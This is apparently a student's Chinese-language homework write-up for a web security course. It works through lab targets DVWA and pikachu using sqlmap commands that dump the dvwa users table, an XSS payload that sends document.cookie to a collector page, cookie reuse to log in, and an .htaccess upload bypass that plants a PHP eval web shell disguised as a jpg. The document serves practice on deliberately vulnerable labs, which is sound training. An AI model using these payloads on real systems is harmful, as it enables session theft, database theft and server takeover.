第八周作业
1、使用Sqlmap工具完成对DVWA数据库的注入过程,要求按照库、表、列、内容的顺序进行注入
使用kali自带的sqlmap工具进行
(1)爆破库名
sqlmap -u "http://10.0.0.5:8080/vulnerabilities/sqli/?id=1&Submit=Submit#" -p id --cookie "PHPSESSID=krb7v0sja509fh1v1eqqe7oeo5; security=low" --batch --current-db
(2)爆破表名
sqlmap -u "http://10.0.0.5:8080/vulnerabilities/sqli/?id=1&Submit=Submit#" -p id --cookie "PHPSESSID=krb7v0sja509fh1v1eqqe7oeo5; security=low" --batch --tables -D "dvwa"
(3)获取字段
(4)获取数据
qlmap -u "http://10.0.0.5:8080/vulnerabilities/sqli/?id=1&Submit=Submit#" -p id --cookie "PHPSESSID=krb7v0sja509fh1v1eqqe7oeo5; security=low" --batch --dump -T "users" -D "dvwa"
2、XSS
(1)完成DVWA靶场存储型XSS的漏洞练习
插入代码:
<script>console.log("你好")</script>
(2)使用pikachu平台练习XSS键盘记录、前台XSS盲打攻击获取cookie,利用cookie实现登录
键盘记录攻击
-
在pikachu靶场下的
pkxss/rkeypress
目录里有一个rk.js
文件,这就是我们的pload
-
在dvwa中的xss存储型靶场中去使用
-
在pikachu管理后台查看,发现成功记录
前台XSS盲打攻击获取cookie
- 插入payload
<script>document.write('<img src="http://127.0.0.1/pkxss/xcookie/cookie.php?cookie='+document.cookie+'"/>')</script>
利用cookie进行登录
安装插件cookie-editor,将得到的cookie保存
2 而后直接访问对应路径即可直接进去,注意:这个方法需要保持原有dvwa靶场使用处于登录状态,否则cookie会失效
(3)使用beef制作钓鱼页面,克隆任意站点的登录页面并获取用户登录的账号密码
3、文件上传
(1)客户端绕过练习
(2)服务端黑名单绕过:给出.htaccess文件绕过的具体步骤
.htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过.htaccess文件,
可以帮我们实现:
网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列
表、配置默认文档等功能。上传.htaccess文件,来绕过黑名单。
前提条件
1.mod_rewrite模块开启
2.AllowOverride Al
先创建一个.htaccess文件,注意htaccess文件不需要名字。写入下面代码
<!-- .htaccess文件 -->
<FilesMatch "magedu.jpg">
Sethandler application/x-httpd-php
</FilesMatch>
然后创建一个magedu.php的文件
//magedu.jpg
<?php @eval($_POST["magedu"]);?>
写入上面代码后将后缀改为jpg后
先上传.htacess文件
再上传magedu.jpg